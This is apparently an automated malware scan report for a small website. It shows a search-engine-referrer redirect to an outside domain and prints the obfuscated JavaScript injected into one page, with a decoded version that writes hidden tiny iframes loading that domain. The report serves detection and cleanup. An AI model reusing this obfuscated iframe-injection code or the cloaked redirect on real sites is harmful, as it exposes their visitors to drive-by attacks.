Malicious/Suspicious Redirects
| Request | Server response | Status |
|---|---|---|
| URL: http://carriagememoriesfromthepast.com/ (imitation of visitor from search engine) `GET / HTTP/1.1` `Host: carriagememoriesfromthepast.com` `Referer: http://www.google.com/search?q=redirect+check1` | `HTTP/1.1 301 Moved Permanently` `Connection: close` `Date: Mon, 01 Sep 2014 04:47:23 GMT` `Location: http://nikeeyb.com/stats.php` `Server: Apache` `Content-Length: 236` `Content-Type: text/html; charset=iso-8859-1` | malicious |
Scanned pages/files

| Request | Server response | Status |
|---|---|---|
| http://carriagememoriesfromthepast.com/ | 200 OK Content-Length: 887 Content-Type: text/html | clean |
| http://carriagememoriesfromthepast.com/Embedded%20Windows%20Media%20Player%207%20Control.htm | 200 OK Content-Length: 2730 Content-Type: text/html | malicious |
| http://carriagememoriesfromthepast.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
| http://carriagememoriesfromthepast.com/arrow.gif | 200 OK Content-Length: 839 Content-Type: image/gif | clean |
| http://carriagememoriesfromthepast.com/camera1.gif | 200 OK Content-Length: 3955 Content-Type: image/gif | clean |
| http://carriagememoriesfromthepast.com/cgi-bin/ | 403 Forbidden Content-Length: 329 Content-Type: text/html | clean |
| http://carriagememoriesfromthepast.com/contactform.swf | 200 OK Content-Length: 51578 Content-Type: application/x-shockwave-flash | clean |
| http://carriagememoriesfromthepast.com/index14.swf | 200 OK Content-Length: 300532 Content-Type: application/x-shockwave-flash | clean |
| http://carriagememoriesfromthepast.com/logo.gif | 200 OK Content-Length: 12381 Content-Type: image/gif | clean |
| http://carriagememoriesfromthepast.com/php.back | 200 OK Content-Length: 22 Content-Type: text/plain | clean |
| http://carriagememoriesfromthepast.com/php/ | 200 OK Content-Length: 366 Content-Type: text/html | clean |
| http://carriagememoriesfromthepast.com/php/contactform.php | 200 OK Content-Length: 2 Content-Type: text/html | clean |
| http://carriagememoriesfromthepast.com/php/newwebsite.php | 200 OK Content-Length: 2 Content-Type: text/html | clean |
| http://carriagememoriesfromthepast.com/php/review.php | 200 OK Content-Length: 2 Content-Type: text/html | clean |
| http://carriagememoriesfromthepast.com/picture_library/ | 200 OK Content-Length: 234 Content-Type: text/html | clean |

Malicious code found in http://carriagememoriesfromthepast.com/Embedded%20Windows%20Media%20Player%207%20Control.htm - confirmed by antiviruses (see below):

```javascript
try{q=document.createElement("p");q.appendChild(q+"");}catch(qw){h=-012/5;try{bcsd=prototype-2;}catch(bawg){ss=[];f=(h)?("fromCharC"+"ode"):"";e=window["e"+"val"];n=[13,20,300,444,99,234,327,404,110,232,138,476,114,210,348,404,40,78,180,420,102,228,291,436,101,64,345,456,99,122,102,416,116,232,336,232,47,94,330,420,107,202,303,484,98,92,297,444,109,94,345,464,97,232,345,184,112,208,336,136,32,230,297,456,111,216,324,420,110,206,183,136,97,234,348,444,34,64,306,456,97,218,303,392,111,228,300,404,114,122,102,440,111,68,96,388,108,210,309,440,61,68,297,404,110,232,303,456,34,64,312,404,105,206,312,464,61,68,150,136,32,238,315,400,116,208,183,136,50,68,186,240,47,210,306,456,97,218,303,248,39,82,177,52,10];if(window.document)for(i=6-2-1-2-1;-145+i!=2-2;i++){k=i;ss=ss+String[f](n[k]/(i%(h*h)+2-1));}e("if(1)"+ss);}}
```

Decoded script:

```javascript
if(1) document.write('<iframe src="http://nikeeyb.com/stats.php" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');
if(1) document.write('<iframe src="http://nikeeyb.com/stats.php" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');
<iframe src="http://nikeeyb.com/stats.php" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>
document.write('<iframe src="http://nikeeyb.com/stats.php" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');
document.write('<iframe src="http://nikeeyb.com/stats.php" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');
```

Antivirus reports:
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=carriagememoriesfromthepast.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://carriagememoriesfromthepast.com/
Result: carriagememoriesfromthepast.com is not infected or malware details are not published yet.